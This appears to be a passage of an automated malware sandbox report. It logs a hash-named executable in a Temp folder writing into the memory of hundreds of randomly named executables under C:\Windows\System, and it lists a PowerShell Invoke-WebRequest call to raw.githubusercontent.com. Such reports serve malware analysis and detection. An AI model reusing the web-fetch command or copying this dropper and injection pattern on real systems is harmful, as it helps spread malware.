PID 2348 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\sIwWnBa.exe
PID 2348 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ebHpxrH.exe
PID 2348 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ebHpxrH.exe
PID 2348 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ebHpxrH.exe
PID 2348 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xFkYNii.exe
PID 2348 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xFkYNii.exe
PID 2348 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xFkYNii.exe
PID 2348 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\NqTNEDg.exe
PID 2348 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\NqTNEDg.exe
PID 2348 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\NqTNEDg.exe
PID 2348 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\zdadgdg.exe
PID 2348 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\zdadgdg.exe
PID 2348 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\zdadgdg.exe
PID 2348 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\TXMDJsx.exe
PID 2348 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\TXMDJsx.exe
PID 2348 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\TXMDJsx.exe
PID 2348 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PIDbzEL.exe
PID 2348 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PIDbzEL.exe
PID 2348 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\PIDbzEL.exe
PID 2348 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\JAmRzzh.exe
PID 2348 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\JAmRzzh.exe
PID 2348 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\JAmRzzh.exe
PID 2348 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\QpTyTVj.exe
PID 2348 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\QpTyTVj.exe
PID 2348 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\QpTyTVj.exe
PID 2348 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qptySaA.exe
PID 2348 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qptySaA.exe
PID 2348 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qptySaA.exe
PID 2348 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\tEImjCa.exe
PID 2348 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\tEImjCa.exe
PID 2348 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\tEImjCa.exe
PID 2348 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\AkzluIL.exe
PID 2348 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\AkzluIL.exe
PID 2348 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\AkzluIL.exe
PID 2348 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\kpIZRHh.exe
PID 2348 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\kpIZRHh.exe
PID 2348 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\kpIZRHh.exe
PID 2348 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KXVVphN.exe
PID 2348 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KXVVphN.exe
PID 2348 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KXVVphN.exe
PID 2348 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\mlTjGPZ.exe
PID 2348 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\mlTjGPZ.exe
PID 2348 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\mlTjGPZ.exe
PID 2348 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\LnujtEy.exe
PID 2348 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\LnujtEy.exe
PID 2348 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\LnujtEy.exe
PID 2348 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\CmTYzrq.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\nxsgwQw.exe

C:\Windows\System\nxsgwQw.exe

C:\Windows\System\jBcQhYe.exe

C:\Windows\System\jBcQhYe.exe

C:\Windows\System\DEwbDna.exe

C:\Windows\System\DEwbDna.exe

C:\Windows\System\tttNocG.exe

C:\Windows\System\tttNocG.exe

C:\Windows\System\sIwWnBa.exe

C:\Windows\System\sIwWnBa.exe

C:\Windows\System\ebHpxrH.exe

C:\Windows\System\ebHpxrH.exe

C:\Windows\System\xFkYNii.exe

C:\Windows\System\xFkYNii.exe

C:\Windows\System\NqTNEDg.exe

C:\Windows\System\NqTNEDg.exe

C:\Windows\System\zdadgdg.exe

C:\Windows\System\zdadgdg.exe

C:\Windows\System\TXMDJsx.exe

C:\Windows\System\TXMDJsx.exe

C:\Windows\System\PIDbzEL.exe

C:\Windows\System\PIDbzEL.exe

C:\Windows\System\JAmRzzh.exe

C:\Windows\System\JAmRzzh.exe

C:\Windows\System\QpTyTVj.exe

C:\Windows\System\QpTyTVj.exe

C:\Windows\System\qptySaA.exe

C:\Windows\System\qptySaA.exe

C:\Windows\System\tEImjCa.exe

C:\Windows\System\tEImjCa.exe

C:\Windows\System\AkzluIL.exe

C:\Windows\System\AkzluIL.exe

C:\Windows\System\kpIZRHh.exe

C:\Windows\System\kpIZRHh.exe

C:\Windows\System\KXVVphN.exe

C:\Windows\System\KXVVphN.exe

C:\Windows\System\mlTjGPZ.exe

C:\Windows\System\mlTjGPZ.exe

C:\Windows\System\LnujtEy.exe

C:\Windows\System\LnujtEy.exe

C:\Windows\System\CmTYzrq.exe

C:\Windows\System\CmTYzrq.exe

C:\Windows\System\XbvDRjO.exe

C:\Windows\System\XbvDRjO.exe

C:\Windows\System\nnDxpye.exe

C:\Windows\System\nnDxpye.exe

C:\Windows\System\brlnahK.exe

C:\Windows\System\brlnahK.exe

C:\Windows\System\tlLCerR.exe

C:\Windows\System\tlLCerR.exe

C:\Windows\System\KwBrXPP.exe

C:\Windows\System\KwBrXPP.exe

C:\Windows\System\LPRaNIX.exe

C:\Windows\System\LPRaNIX.exe

C:\Windows\System\lTdoEQY.exe

C:\Windows\System\lTdoEQY.exe

C:\Windows\System\viZeKFh.exe

C:\Windows\System\viZeKFh.exe

C:\Windows\System\vDkrPrV.exe

C:\Windows\System\vDkrPrV.exe

C:\Windows\System\cGNIoNf.exe

C:\Windows\System\cGNIoNf.exe

C:\Windows\System\lbYyMSG.exe

C:\Windows\System\lbYyMSG.exe

C:\Windows\System\OiZMVrb.exe

C:\Windows\System\OiZMVrb.exe

C:\Windows\System\XODUMtS.exe

C:\Windows\System\XODUMtS.exe

C:\Windows\System\ZBfARBT.exe

C:\Windows\System\ZBfARBT.exe

C:\Windows\System\ZZYpJDG.exe

C:\Windows\System\ZZYpJDG.exe

C:\Windows\System\HTMLqID.exe

C:\Windows\System\HTMLqID.exe

C:\Windows\System\krZQQiq.exe

C:\Windows\System\krZQQiq.exe

C:\Windows\System\QqctqeI.exe

C:\Windows\System\QqctqeI.exe

C:\Windows\System\bYbnSdh.exe

C:\Windows\System\bYbnSdh.exe

C:\Windows\System\iWKzWuz.exe

C:\Windows\System\iWKzWuz.exe

C:\Windows\System\zhMsDmc.exe

C:\Windows\System\zhMsDmc.exe

C:\Windows\System\pyXqLnw.exe

C:\Windows\System\pyXqLnw.exe

C:\Windows\System\ZHEwIKi.exe

C:\Windows\System\ZHEwIKi.exe

C:\Windows\System\GOhOzij.exe

C:\Windows\System\GOhOzij.exe

C:\Windows\System\rKQTeYH.exe

C:\Windows\System\rKQTeYH.exe

C:\Windows\System\rityzKa.exe

C:\Windows\System\rityzKa.exe

C:\Windows\System\yFhiVRN.exe

C:\Windows\System\yFhiVRN.exe

C:\Windows\System\VCuPpez.exe

C:\Windows\System\VCuPpez.exe

C:\Windows\System\iwQdpqw.exe

C:\Windows\System\iwQdpqw.exe

C:\Windows\System\tnjYSaC.exe

C:\Windows\System\tnjYSaC.exe

C:\Windows\System\YkLWwcL.exe

C:\Windows\System\YkLWwcL.exe

C:\Windows\System\NeqOnVH.exe

C:\Windows\System\NeqOnVH.exe

C:\Windows\System\bHOngCm.exe

C:\Windows\System\bHOngCm.exe

C:\Windows\System\uOZeKVF.exe

C:\Windows\System\uOZeKVF.exe

C:\Windows\System\ZpCJiQq.exe

C:\Windows\System\ZpCJiQq.exe

C:\Windows\System\KCqlKQe.exe

C:\Windows\System\KCqlKQe.exe

C:\Windows\System\OHLIhKZ.exe

C:\Windows\System\OHLIhKZ.exe

C:\Windows\System\btPVlPS.exe

C:\Windows\System\btPVlPS.exe

C:\Windows\System\aKftMEX.exe

C:\Windows\System\aKftMEX.exe

C:\Windows\System\MXDtfnB.exe

C:\Windows\System\MXDtfnB.exe

C:\Windows\System\UmEIzYQ.exe

C:\Windows\System\UmEIzYQ.exe

C:\Windows\System\MPzOIQH.exe

C:\Windows\System\MPzOIQH.exe

C:\Windows\System\LBukKgf.exe

C:\Windows\System\LBukKgf.exe

C:\Windows\System\fspBWTD.exe

C:\Windows\System\fspBWTD.exe

C:\Windows\System\oYYVOua.exe

C:\Windows\System\oYYVOua.exe

C:\Windows\System\UfTxeUP.exe

C:\Windows\System\UfTxeUP.exe

C:\Windows\System\JiWRszz.exe

C:\Windows\System\JiWRszz.exe

C:\Windows\System\naDrIMz.exe

C:\Windows\System\naDrIMz.exe

C:\Windows\System\oUBPAPv.exe

C:\Windows\System\oUBPAPv.exe

C:\Windows\System\tquUTmz.exe

C:\Windows\System\tquUTmz.exe

C:\Windows\System\fpUnTzj.exe

C:\Windows\System\fpUnTzj.exe

C:\Windows\System\VTNNpMM.exe

C:\Windows\System\VTNNpMM.exe

C:\Windows\System\WiVxiSd.exe

C:\Windows\System\WiVxiSd.exe

C:\Windows\System\bNKAxyg.exe

C:\Windows\System\bNKAxyg.exe

C:\Windows\System\fqYlNeu.exe

C:\Windows\System\fqYlNeu.exe

C:\Windows\System\EzZZWpv.exe

C:\Windows\System\EzZZWpv.exe

C:\Windows\System\YMXtrRA.exe

C:\Windows\System\YMXtrRA.exe

C:\Windows\System\RGyIiQh.exe

C:\Windows\System\RGyIiQh.exe

C:\Windows\System\ifmxnQs.exe

C:\Windows\System\ifmxnQs.exe

C:\Windows\System\DRobVYl.exe

C:\Windows\System\DRobVYl.exe

C:\Windows\System\hcvrKux.exe

C:\Windows\System\hcvrKux.exe

C:\Windows\System\rEmAcot.exe

C:\Windows\System\rEmAcot.exe

C:\Windows\System\xfAqZGT.exe

C:\Windows\System\xfAqZGT.exe

C:\Windows\System\GkbpUMg.exe

C:\Windows\System\GkbpUMg.exe

C:\Windows\System\cxxBGhk.exe

C:\Windows\System\cxxBGhk.exe

C:\Windows\System\MTSwqlu.exe

C:\Windows\System\MTSwqlu.exe

C:\Windows\System\TIpbCzm.exe

C:\Windows\System\TIpbCzm.exe

C:\Windows\System\naivDdQ.exe

C:\Windows\System\naivDdQ.exe

C:\Windows\System\JhCbqVJ.exe

C:\Windows\System\JhCbqVJ.exe

C:\Windows\System\xuEpJqO.exe

C:\Windows\System\xuEpJqO.exe

C:\Windows\System\TjYHpiE.exe

C:\Windows\System\TjYHpiE.exe

C:\Windows\System\xipySoa.exe

C:\Windows\System\xipySoa.exe

C:\Windows\System\icvUzwk.exe

C:\Windows\System\icvUzwk.exe

C:\Windows\System\zdjHxlJ.exe

C:\Windows\System\zdjHxlJ.exe

C:\Windows\System\NLNKUDm.exe

C:\Windows\System\NLNKUDm.exe

C:\Windows\System\jmbUZAU.exe

C:\Windows\System\jmbUZAU.exe

C:\Windows\System\vGiFguG.exe

C:\Windows\System\vGiFguG.exe

C:\Windows\System\siAaPtj.exe

C:\Windows\System\siAaPtj.exe

C:\Windows\System\rXKRXXt.exe

C:\Windows\System\rXKRXXt.exe

C:\Windows\System\GtXGsFa.exe

C:\Windows\System\GtXGsFa.exe

C:\Windows\System\uZoxdYV.exe

C:\Windows\System\uZoxdYV.exe

C:\Windows\System\khqnACV.exe

C:\Windows\System\khqnACV.exe

C:\Windows\System\zhTCpIQ.exe

C:\Windows\System\zhTCpIQ.exe

C:\Windows\System\PTTofAD.exe

C:\Windows\System\PTTofAD.exe

C:\Windows\System\bjJcVNu.exe

C:\Windows\System\bjJcVNu.exe

C:\Windows\System\BnSRbmm.exe

C:\Windows\System\BnSRbmm.exe

C:\Windows\System\iUSOySf.exe

C:\Windows\System\iUSOySf.exe

C:\Windows\System\ctaFZpr.exe

C:\Windows\System\ctaFZpr.exe

C:\Windows\System\coSMDzz.exe

C:\Windows\System\coSMDzz.exe

C:\Windows\System\wxwLUhs.exe

C:\Windows\System\wxwLUhs.exe

C:\Windows\System\QrZEypg.exe

C:\Windows\System\QrZEypg.exe

C:\Windows\System\GvsUMNP.exe

C:\Windows\System\GvsUMNP.exe

C:\Windows\System\nGVXhJd.exe

C:\Windows\System\nGVXhJd.exe

C:\Windows\System\IoVaLOB.exe

C:\Windows\System\IoVaLOB.exe

C:\Windows\System\mZjUBYC.exe

C:\Windows\System\mZjUBYC.exe

C:\Windows\System\BtzSdCK.exe

C:\Windows\System\BtzSdCK.exe

C:\Windows\System\BKwkbGO.exe

C:\Windows\System\BKwkbGO.exe

C:\Windows\System\upfyPra.exe

C:\Windows\System\upfyPra.exe

C:\Windows\System\zAoxdFC.exe

C:\Windows\System\zAoxdFC.exe

C:\Windows\System\jFoMvSF.exe

C:\Windows\System\jFoMvSF.exe

C:\Windows\System\hbIqxkA.exe

C:\Windows\System\hbIqxkA.exe

C:\Windows\System\hUmKuyG.exe

C:\Windows\System\hUmKuyG.exe

C:\Windows\System\nKBNRSf.exe

C:\Windows\System\nKBNRSf.exe

C:\Windows\System\ldnZiYx.exe

C:\Windows\System\ldnZiYx.exe

C:\Windows\System\piXefdk.exe

C:\Windows\System\piXefdk.exe

C:\Windows\System\JoWcXKA.exe

C:\Windows\System\JoWcXKA.exe

C:\Windows\System\eMYbYih.exe

C:\Windows\System\eMYbYih.exe

C:\Windows\System\BkFkJeu.exe

C:\Windows\System\BkFkJeu.exe

C:\Windows\System\qOhCWDS.exe

C:\Windows\System\qOhCWDS.exe

C:\Windows\System\RyHXcrP.exe

C:\Windows\System\RyHXcrP.exe

C:\Windows\System\HcZsTtp.exe

C:\Windows\System\HcZsTtp.exe

C:\Windows\System\KkgpPak.exe

C:\Windows\System\KkgpPak.exe

C:\Windows\System\vuRnvyw.exe

C:\Windows\System\vuRnvyw.exe

C:\Windows\System\YUPohhc.exe

C:\Windows\System\YUPohhc.exe

C:\Windows\System\tQCDMRy.exe

C:\Windows\System\tQCDMRy.exe

C:\Windows\System\YHajnzo.exe

C:\Windows\System\YHajnzo.exe

C:\Windows\System\uzAYVyQ.exe

C:\Windows\System\uzAYVyQ.exe

C:\Windows\System\SpfxuvM.exe

C:\Windows\System\SpfxuvM.exe

C:\Windows\System\SVZZPlI.exe

C:\Windows\System\SVZZPlI.exe

C:\Windows\System\hZthwOL.exe

C:\Windows\System\hZthwOL.exe

C:\Windows\System\UZsvwnp.exe

C:\Windows\System\UZsvwnp.exe

C:\Windows\System\HeyElVa.exe

C:\Windows\System\HeyElVa.exe

C:\Windows\System\BZKVOdw.exe

C:\Windows\System\BZKVOdw.exe

C:\Windows\System\JHQjCRv.exe

C:\Windows\System\JHQjCRv.exe

C:\Windows\System\UwftOEl.exe

C:\Windows\System\UwftOEl.exe

C:\Windows\System\FvvdowM.exe

C:\Windows\System\FvvdowM.exe

C:\Windows\System\FlGjJkZ.exe

C:\Windows\System\FlGjJkZ.exe

C:\Windows\System\qPhLGTU.exe

C:\Windows\System\qPhLGTU.exe

C:\Windows\System\bVhRsmg.exe

C:\Windows\System\bVhRsmg.exe

C:\Windows\System\fkAhznj.exe

C:\Windows\System\fkAhznj.exe

C:\Windows\System\fpRzkDm.exe

C:\Windows\System\fpRzkDm.exe

C:\Windows\System\MkIgvqk.exe

C:\Windows\System\MkIgvqk.exe

C:\Windows\System\sGfcvgi.exe

C:\Windows\System\sGfcvgi.exe

C:\Windows\System\vlzwfpT.exe

C:\Windows\System\vlzwfpT.exe

C:\Windows\System\aJhHCIp.exe

C:\Windows\System\aJhHCIp.exe

C:\Windows\System\TqHbgoS.exe

C:\Windows\System\TqHbgoS.exe

C:\Windows\System\WMtAvlo.exe

C:\Windows\System\WMtAvlo.exe

C:\Windows\System\JLrouUw.exe

C:\Windows\System\JLrouUw.exe

C:\Windows\System\oiPaypj.exe

C:\Windows\System\oiPaypj.exe

C:\Windows\System\GrtTWBq.exe

C:\Windows\System\GrtTWBq.exe

C:\Windows\System\aGufytt.exe

C:\Windows\System\aGufytt.exe

C:\Windows\System\frTZXyT.exe

C:\Windows\System\frTZXyT.exe

C:\Windows\System\qevnBPR.exe

C:\Windows\System\qevnBPR.exe

C:\Windows\System\mSkSZvB.exe

C:\Windows\System\mSkSZvB.exe

C:\Windows\System\XYaQHRw.exe

C:\Windows\System\XYaQHRw.exe

C:\Windows\System\Kvmgyts.exe

C:\Windows\System\Kvmgyts.exe

C:\Windows\System\nOzqFRW.exe

C:\Windows\System\nOzqFRW.exe

C:\Windows\System\phsvILE.exe

C:\Windows\System\phsvILE.exe

C:\Windows\System\DpspqiL.exe

C:\Windows\System\DpspqiL.exe

C:\Windows\System\UOrJsTY.exe

C:\Windows\System\UOrJsTY.exe

C:\Windows\System\kGeqRpi.exe

C:\Windows\System\kGeqRpi.exe

C:\Windows\System\eppxaRK.exe

C:\Windows\System\eppxaRK.exe

C:\Windows\System\XDCMkZp.exe

C:\Windows\System\XDCMkZp.exe

C:\Windows\System\rhqjKEv.exe

C:\Windows\System\rhqjKEv.exe

C:\Windows\System\TxqTefO.exe

C:\Windows\System\TxqTefO.exe

C:\Windows\System\xVZjusz.exe

C:\Windows\System\xVZjusz.exe

C:\Windows\System\kEMGYTw.exe

C:\Windows\System\kEMGYTw.exe

C:\Windows\System\cEobGEE.exe

C:\Windows\System\cEobGEE.exe

C:\Windows\System\fQCQbPK.exe

C:\Windows\System\fQCQbPK.exe

C:\Windows\System\OrZyEug.exe

C:\Windows\System\OrZyEug.exe

C:\Windows\System\WqOgHhk.exe

C:\Windows\System\WqOgHhk.exe

C:\Windows\System\MAogBtr.exe

C:\Windows\System\MAogBtr.exe

C:\Windows\System\pbTSSEl.exe

C:\Windows\System\pbTSSEl.exe

C:\Windows\System\SyumXPi.exe

C:\Windows\System\SyumXPi.exe

C:\Windows\System\kobqjRT.exe

C:\Windows\System\kobqjRT.exe

C:\Windows\System\wXLwVTV.exe

C:\Windows\System\wXLwVTV.exe

C:\Windows\System\mCuvCEB.exe

C:\Windows\System\mCuvCEB.exe

C:\Windows\System\NOrfTHZ.exe

C:\Windows\System\NOrfTHZ.exe

C:\Windows\System\tIooAqV.exe

C:\Windows\System\tIooAqV.exe

C:\Windows\System\gewIOTt.exe

C:\Windows\System\gewIOTt.exe

C:\Windows\System\uryVLdb.exe

C:\Windows\System\uryVLdb.exe

C:\Windows\System\daMSUdH.exe

C:\Windows\System\daMSUdH.exe

C:\Windows\System\HAEAPEI.exe

C:\Windows\System\HAEAPEI.exe

C:\Windows\System\mMcrnjW.exe

C:\Windows\System\mMcrnjW.exe

C:\Windows\System\cdQZLWD.exe

C:\Windows\System\cdQZLWD.exe

C:\Windows\System\dVJXgNE.exe

C:\Windows\System\dVJXgNE.exe

C:\Windows\System\ZmllzVW.exe

C:\Windows\System\ZmllzVW.exe

C:\Windows\System\tgzSwlD.exe

C:\Windows\System\tgzSwlD.exe

C:\Windows\System\MbtHIQY.exe

C:\Windows\System\MbtHIQY.exe

C:\Windows\System\qtqcEFa.exe

C:\Windows\System\qtqcEFa.exe

C:\Windows\System\mNPoOcX.exe

C:\Windows\System\mNPoOcX.exe

C:\Windows\System\CEofRBv.exe

C:\Windows\System\CEofRBv.exe

C:\Windows\System\vjNumov.exe

C:\Windows\System\vjNumov.exe

C:\Windows\System\dCOBXOa.exe

C:\Windows\System\dCOBXOa.exe

C:\Windows\System\WfkMlJf.exe

C:\Windows\System\WfkMlJf.exe

C:\Windows\System\AzqrFuY.exe

C:\Windows\System\AzqrFuY.exe

C:\Windows\System\DfMWTEk.exe

C:\Windows\System\DfMWTEk.exe

C:\Windows\System\Ruqhqxf.exe

C:\Windows\System\Ruqhqxf.exe

C:\Windows\System\DnApkUJ.exe

C:\Windows\System\DnApkUJ.exe

C:\Windows\System\CxUsacO.exe

C:\Windows\System\CxUsacO.exe

C:\Windows\System\qNufNJg.exe

C:\Windows\System\qNufNJg.exe

C:\Windows\System\HVfuHHo.exe

C:\Windows\System\HVfuHHo.exe

C:\Windows\System\tikZRjs.exe

C:\Windows\System\tikZRjs.exe

C:\Windows\System\NapopCB.exe

C:\Windows\System\NapopCB.exe

C:\Windows\System\IiClgVY.exe

C:\Windows\System\IiClgVY.exe

C:\Windows\System\ebiajMZ.exe

C:\Windows\System\ebiajMZ.exe

C:\Windows\System\DSuyZJj.exe

C:\Windows\System\DSuyZJj.exe

C:\Windows\System\urossLg.exe

C:\Windows\System\urossLg.exe

C:\Windows\System\oZWDbKI.exe

C:\Windows\System\oZWDbKI.exe

C:\Windows\System\WBOwICi.exe

C:\Windows\System\WBOwICi.exe

C:\Windows\System\lAmSoiN.exe

C:\Windows\System\lAmSoiN.exe

C:\Windows\System\hyPYjPU.exe

C:\Windows\System\hyPYjPU.exe

C:\Windows\System\kZJbvSW.exe

C:\Windows\System\kZJbvSW.exe

C:\Windows\System\rFRwnNa.exe

C:\Windows\System\rFRwnNa.exe

C:\Windows\System\RyDprhj.exe

C:\Windows\System\RyDprhj.exe

C:\Windows\System\TnfcqJu.exe

C:\Windows\System\TnfcqJu.exe

C:\Windows\System\oPQrnWL.exe

C:\Windows\System\oPQrnWL.exe

C:\Windows\System\xnKPzLO.exe

C:\Windows\System\xnKPzLO.exe

C:\Windows\System\CUbeoap.exe

C:\Windows\System\CUbeoap.exe

C:\Windows\System\tJufVsj.exe

C:\Windows\System\tJufVsj.exe

C:\Windows\System\rrBWkDv.exe

C:\Windows\System\rrBWkDv.exe

C:\Windows\System\GtIuGJC.exe

C:\Windows\System\GtIuGJC.exe

C:\Windows\System\vWoTIcb.exe

C:\Windows\System\vWoTIcb.exe

C:\Windows\System\YOGxcyc.exe

C:\Windows\System\YOGxcyc.exe

C:\Windows\System\AqVNLPJ.exe

C:\Windows\System\AqVNLPJ.exe

C:\Windows\System\lYIFNog.exe

C:\Windows\System\lYIFNog.exe

C:\Windows\System\dYCeleH.exe

C:\Windows\System\dYCeleH.exe

C:\Windows\System\ZULxDLL.exe

C:\Windows\System\ZULxDLL.exe

C:\Windows\System\tnEWsvH.exe

C:\Windows\System\tnEWsvH.exe

C:\Windows\System\OFhFtiJ.exe

C:\Windows\System\OFhFtiJ.exe

C:\Windows\System\RVTpNJv.exe

C:\Windows\System\RVTpNJv.exe

C:\Windows\System\vEYmnQF.exe

C:\Windows\System\vEYmnQF.exe

C:\Windows\System\WlULZLs.exe

C:\Windows\System\WlULZLs.exe

C:\Windows\System\CZADWPd.exe

C:\Windows\System\CZADWPd.exe

C:\Windows\System\UBbnKgH.exe

C:\Windows\System\UBbnKgH.exe

C:\Windows\System\FOxpCbG.exe

C:\Windows\System\FOxpCbG.exe

C:\Windows\System\zOLPNsP.exe

C:\Windows\System\zOLPNsP.exe

C:\Windows\System\HYnewYY.exe

C:\Windows\System\HYnewYY.exe

C:\Windows\System\PUGqzXd.exe

C:\Windows\System\PUGqzXd.exe

C:\Windows\System\PhcGrtb.exe

C:\Windows\System\PhcGrtb.exe

C:\Windows\System\TJSTzaA.exe

C:\Windows\System\TJSTzaA.exe

C:\Windows\System\hjhsjMs.exe

C:\Windows\System\hjhsjMs.exe

C:\Windows\System\jsFncuy.exe

C:\Windows\System\jsFncuy.exe

C:\Windows\System\MedbBrY.exe

C:\Windows\System\MedbBrY.exe

C:\Windows\System\VSRZVOI.exe

C:\Windows\System\VSRZVOI.exe

C:\Windows\System\YNGyuXZ.exe

C:\Windows\System\YNGyuXZ.exe

C:\Windows\System\oxkDOcV.exe

C:\Windows\System\oxkDOcV.exe

C:\Windows\System\YnWiMJB.exe

C:\Windows\System\YnWiMJB.exe

C:\Windows\System\CWaFUPr.exe

C:\Windows\System\CWaFUPr.exe

C:\Windows\System\EFPyYdT.exe

C:\Windows\System\EFPyYdT.exe

C:\Windows\System\lnEXmAd.exe

C:\Windows\System\lnEXmAd.exe

C:\Windows\System\weabufz.exe

C:\Windows\System\weabufz.exe

C:\Windows\System\eCJUxpd.exe

C:\Windows\System\eCJUxpd.exe

C:\Windows\System\yLWIZXJ.exe

C:\Windows\System\yLWIZXJ.exe

C:\Windows\System\KGbsmXl.exe

C:\Windows\System\KGbsmXl.exe

